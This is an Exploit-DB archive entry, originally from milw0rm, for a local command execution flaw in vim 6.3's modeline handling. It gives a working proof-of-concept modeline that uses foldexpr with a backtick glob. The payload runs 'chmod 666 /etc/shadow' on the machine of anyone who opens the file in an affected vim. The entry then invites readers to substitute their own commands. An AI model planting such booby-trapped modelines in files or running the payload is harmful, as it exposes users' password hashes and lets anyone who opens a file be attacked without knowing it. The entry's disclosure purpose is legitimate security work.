vim 6.3 < 6.3.082 - 'modlines' Local Command Execution

Author: Georgi Guninski
type: local
platform: multiple
port: 
date_added: 2005-07-24  
date_updated: 2016-05-25  
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comvim-6.3.tar.bz2  

raw file: 1119.txt  

1) open up a text file.

2) insert at the top the information (below).

/* vim: foldmethod=expr:foldexpr=glob("`chmod\ 666\ /etc/shadow`") */

3) if modlines = on anyone that opens the file with vim will execute the command:
   chmod 666 /etc/shadow

Have fun making your own commands.

The advisory can be found at:
  http://www.guninski.com/where_do_you_want_billg_to_go_today_5.html

/str0ke

# milw0rm.com [2005-07-25]